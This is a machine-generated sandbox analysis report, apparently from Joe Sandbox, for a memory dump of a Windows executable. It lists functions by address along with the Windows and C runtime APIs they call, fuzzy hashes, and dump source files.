                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4218353326-0
                                                                                                          • Opcode ID: 1ea59b8d192a443753f11152aadad8068b45e118311de47093c8b1805f74a16e
                                                                                                          • Instruction ID: 637e96d85ee4e17106f803ae7842eb7824b7e3668770bb833bf4dee4a6694f62
                                                                                                          • Opcode Fuzzy Hash: 1ea59b8d192a443753f11152aadad8068b45e118311de47093c8b1805f74a16e
                                                                                                          • Instruction Fuzzy Hash: 0B41AF71600108ABCB14EB64DDD1EEEB7E9EF54310F14A155F85ABB2A2DB34AD05CB90
                                                                                                          Function 00EC8E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EC8F03
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InvalidateRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 634782764-0
                                                                                                          • Opcode ID: 96c10e07345a4c942319ef41bf5a254aa32566e33c60de06b60a41a3329adf3f
                                                                                                          • Instruction ID: 1369ea127cf050602eed17a3749862e59f9732c0f2cca2a6b77bf2c384a98f85
                                                                                                          • Opcode Fuzzy Hash: 96c10e07345a4c942319ef41bf5a254aa32566e33c60de06b60a41a3329adf3f
                                                                                                          • Instruction Fuzzy Hash: 5B31D23070025CAEEB249A18CF49FEC37A6EB05314F14551EFA11F61E0CF72E952DA51
                                                                                                          Function 00ECB1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ClientToScreen.USER32(?,?), ref: 00ECB1D2
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00ECB248
                                                                                                          • PtInRect.USER32(?,?,00ECC6BC), ref: 00ECB258
                                                                                                          • MessageBeep.USER32(00000000), ref: 00ECB2C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1352109105-0
                                                                                                          • Opcode ID: b6f7973c1cc32bdc027041d4d9ad3206006c9f2cceef5790e68641442ac3e76b
                                                                                                          • Instruction ID: 71282e67927c333b3ba12cb98de6fc7c8ebb219afcd439243d6ef599e09401b9
                                                                                                          • Opcode Fuzzy Hash: b6f7973c1cc32bdc027041d4d9ad3206006c9f2cceef5790e68641442ac3e76b
                                                                                                          • Instruction Fuzzy Hash: B5418E30A04218DFDB19DF58D986FAD7BF5FF49314F1894A9E818AB260D332E842CB50
                                                                                                          Function 00EA12D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EA1326
                                                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EA1342
                                                                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00EA13A8
                                                                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00EA13FA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 432972143-0
                                                                                                          • Opcode ID: 04e7f168fc15ed57be3d9b96bd8786de751a1c4e695f7e56d505ef557deb5c2c
                                                                                                          • Instruction ID: 1c3f76478f8575014124384ec1afd1f569cfd053113bd48e165c2f5f0d258f2f
                                                                                                          • Opcode Fuzzy Hash: 04e7f168fc15ed57be3d9b96bd8786de751a1c4e695f7e56d505ef557deb5c2c
                                                                                                          • Instruction Fuzzy Hash: 3F317C30944208AEFF30CE258C05BFD7BB9AB4F314F08929AF4917A5D0C374AD499B51
                                                                                                          Function 00EA1410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00EA1465
                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EA1481
                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00EA14E0
                                                                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00EA1532
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 432972143-0
                                                                                                          • Opcode ID: ddf8c55399bcea9ab59c10a495bcdfb1c3df5d7444840254c4c7094f453bba8e
                                                                                                          • Instruction ID: 242898745347a8dc00079ed0354741b1b9b1aae1878e8b3d2b2aa4e820563802
                                                                                                          • Opcode Fuzzy Hash: ddf8c55399bcea9ab59c10a495bcdfb1c3df5d7444840254c4c7094f453bba8e
                                                                                                          • Instruction Fuzzy Hash: 75316930D442185EFF348A699C04BFEBBA5EF8F314F08539BE4A17A1D1C378A9458B61
                                                                                                          Function 00E763F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E7642B
                                                                                                          • __isleadbyte_l.LIBCMT ref: 00E76459
                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E76487
                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E764BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3058430110-0
                                                                                                          • Opcode ID: f95af10d7a0dae8bca1245232107b49ac57a23383e5664f36b0d0d5dc4671c23
                                                                                                          • Instruction ID: 9367e6edb3534ad5c1299a61fcb799401880ed8bee0784d0e8e33c71d04f7dbc
                                                                                                          • Opcode Fuzzy Hash: f95af10d7a0dae8bca1245232107b49ac57a23383e5664f36b0d0d5dc4671c23
                                                                                                          • Instruction Fuzzy Hash: 3231D031600A56AFDB258F75CC44BAA7BB9FF40328F159069E838A7191EB31E850DB50
                                                                                                          Function 00EC552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 00EC553F
                                                                                                            • Part of subcall function 00EA3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EA3B4E
                                                                                                            • Part of subcall function 00EA3B34: GetCurrentThreadId.KERNEL32 ref: 00EA3B55
                                                                                                            • Part of subcall function 00EA3B34: AttachThreadInput.USER32(00000000,?,00EA55C0), ref: 00EA3B5C
                                                                                                          • GetCaretPos.USER32(?), ref: 00EC5550
                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00EC558B
                                                                                                          • GetForegroundWindow.USER32 ref: 00EC5591
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759813231-0
                                                                                                          • Opcode ID: b960259f0e305b4e7ae1cc49cad2dd223107d520540ef3caf82547e3fd2cf3a9
                                                                                                          • Instruction ID: 937fc506c9df3c749c98c75f1d4147bfb8beb86db848cc17815f6dc04672b923
                                                                                                          • Opcode Fuzzy Hash: b960259f0e305b4e7ae1cc49cad2dd223107d520540ef3caf82547e3fd2cf3a9
                                                                                                          • Instruction Fuzzy Hash: 79311CB1A01108AFDB00EFA5D985EEEB7F9EF58304F10506AE815F7241DA71AE458BA0
                                                                                                          Function 00ECCB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • GetCursorPos.USER32(?), ref: 00ECCB7A
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E7BCEC,?,?,?,?,?), ref: 00ECCB8F
                                                                                                          • GetCursorPos.USER32(?), ref: 00ECCBDC
                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E7BCEC,?,?,?), ref: 00ECCC16
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2864067406-0
                                                                                                          • Opcode ID: e8b6538c27b70a21b62462918670f95928fed5568e915ad764bfe50e72859069
                                                                                                          • Instruction ID: 589d7a502691d115e9b8575c67e08cd0821fec4b45f12e07916552c3b1e06bac
                                                                                                          • Opcode Fuzzy Hash: e8b6538c27b70a21b62462918670f95928fed5568e915ad764bfe50e72859069
                                                                                                          • Instruction Fuzzy Hash: 1B31E134600158AFCB259F95D849FFA7BF5FB49310F244499F909AB261C3326D52EFA0
                                                                                                          Function 00E60BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __setmode.LIBCMT ref: 00E60BE2
                                                                                                            • Part of subcall function 00E5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EA7E51,?,?,00000000), ref: 00E54041
                                                                                                            • Part of subcall function 00E5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EA7E51,?,?,00000000,?,?), ref: 00E54065
                                                                                                          • _fprintf.LIBCMT ref: 00E60C19
                                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 00E9694C
                                                                                                            • Part of subcall function 00E64CCA: _flsall.LIBCMT ref: 00E64CE3
                                                                                                          • __setmode.LIBCMT ref: 00E60C4E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 521402451-0
                                                                                                          • Opcode ID: 81b1e3ef075545898108815d59c746299f474f66c1f55b8784bd9391e2d6c298
                                                                                                          • Instruction ID: c0878158c96234e419951b737e199236a52b2abf7e8ed7062e0ae34e298b8da4
                                                                                                          • Opcode Fuzzy Hash: 81b1e3ef075545898108815d59c746299f474f66c1f55b8784bd9391e2d6c298
                                                                                                          • Instruction Fuzzy Hash: E3115BB19441147EC709B7A4BC42ABEB79CDF41361F14215AF204762C2DF211C5697A1
                                                                                                          Function 00E99274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E98D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E98D3F
                                                                                                            • Part of subcall function 00E98D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D49
                                                                                                            • Part of subcall function 00E98D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D58
                                                                                                            • Part of subcall function 00E98D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D5F
                                                                                                            • Part of subcall function 00E98D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D75
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E992C1
                                                                                                          • _memcmp.LIBCMT ref: 00E992E4
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E9931A
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E99321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1592001646-0
                                                                                                          • Opcode ID: dda7719a7f834700b1c5051ededcca7ac544c4b62f8ce05a4e2ab172886ee4d3
                                                                                                          • Instruction ID: 67154613cec974e5aa02cffe5778cda3e6f17ae4d6afdf1295eacdb7bc45456f
                                                                                                          • Opcode Fuzzy Hash: dda7719a7f834700b1c5051ededcca7ac544c4b62f8ce05a4e2ab172886ee4d3
                                                                                                          • Instruction Fuzzy Hash: 8B218C31E41208EFDF20DFA8D945BEEB7B8EF44305F085059E844B7291D770AA04CBA0
                                                                                                          Function 00EC634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00EC63BD
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC63D7
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC63E5
                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EC63F3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                          • String ID:
                                                                                                          • API String ID: 2169480361-0
                                                                                                          • Opcode ID: 76ea1acd534826cefb8595bcd6e56e3a0ef85671cde08de0912446d7bc818115
                                                                                                          • Instruction ID: bdd7b2d6749747e04dd6432d9e43648a79630a1670d6cf9848851c9c46696bcf
                                                                                                          • Opcode Fuzzy Hash: 76ea1acd534826cefb8595bcd6e56e3a0ef85671cde08de0912446d7bc818115
                                                                                                          • Instruction Fuzzy Hash: 81110331305414AFD704AB28EC44FBB7799EF85320F18521DF816EB2D2CB61AC01CB95
                                                                                                          Function 00E9E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E9F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E9E46F,?,?,?,00E9F262,00000000,000000EF,00000119,?,?), ref: 00E9F867
                                                                                                            • Part of subcall function 00E9F858: lstrcpyW.KERNEL32(00000000,?,?,00E9E46F,?,?,?,00E9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E9F88D
                                                                                                            • Part of subcall function 00E9F858: lstrcmpiW.KERNEL32(00000000,?,00E9E46F,?,?,?,00E9F262,00000000,000000EF,00000119,?,?), ref: 00E9F8BE
                                                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E9E488
                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,00E9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E9E4AE
                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E9E4E2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                          • String ID: cdecl
                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                          • Opcode ID: d08ed3441aff10de9537b08b5841e0fb84097a167d924e13453bc375a191e071
                                                                                                          • Instruction ID: 447ffdaab86ca396b7fb9654e1a63aff723835c091715ff0c76465ba2c0af543
                                                                                                          • Opcode Fuzzy Hash: d08ed3441aff10de9537b08b5841e0fb84097a167d924e13453bc375a191e071
                                                                                                          • Instruction Fuzzy Hash: 0C11D07A200345AFCF25EF24EC45E7E77A8FF45354B44502AF90ADB2A0EB319951C791
                                                                                                          Function 00E75312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 00E75331
                                                                                                            • Part of subcall function 00E6593C: __FF_MSGBANNER.LIBCMT ref: 00E65953
                                                                                                            • Part of subcall function 00E6593C: __NMSG_WRITE.LIBCMT ref: 00E6595A
                                                                                                            • Part of subcall function 00E6593C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001,?,00000004,?,?,00E61003,?), ref: 00E6597F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 614378929-0
                                                                                                          • Opcode ID: 3ad554596f6bf26d508cfba896ed157bd384e8a810486ec900fe7f1f3b315ab3
                                                                                                          • Instruction ID: 1cfeca4ecbaea6b3c57a946d41cd53d58d08d36f4f2614c731abd76015ca2f04
                                                                                                          • Opcode Fuzzy Hash: 3ad554596f6bf26d508cfba896ed157bd384e8a810486ec900fe7f1f3b315ab3
                                                                                                          • Instruction Fuzzy Hash: C511C433545A19BFCB202F74BC0569E37D8AF107E5F10A62AF90DBA1B1DEF4894097A0
                                                                                                          Function 00EA4365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EA4385
                                                                                                          • _memset.LIBCMT ref: 00EA43A6
                                                                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EA43F8
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EA4401
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1157408455-0
                                                                                                          • Opcode ID: fa1e93692a4cc02c6bb589f300cb014b748b42147e382b444110c810228f4ece
                                                                                                          • Instruction ID: fa50bf0f1599c9e161e1bd90be9e0533c70f0d95e178a1362b524878a8a6711f
                                                                                                          • Opcode Fuzzy Hash: fa1e93692a4cc02c6bb589f300cb014b748b42147e382b444110c810228f4ece
                                                                                                          • Instruction Fuzzy Hash: 72110DB19022287AD7309BA5AC4DFEBBB7CEF45760F04459AF908F71D0D2704E848BA4
                                                                                                          Function 00EB6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
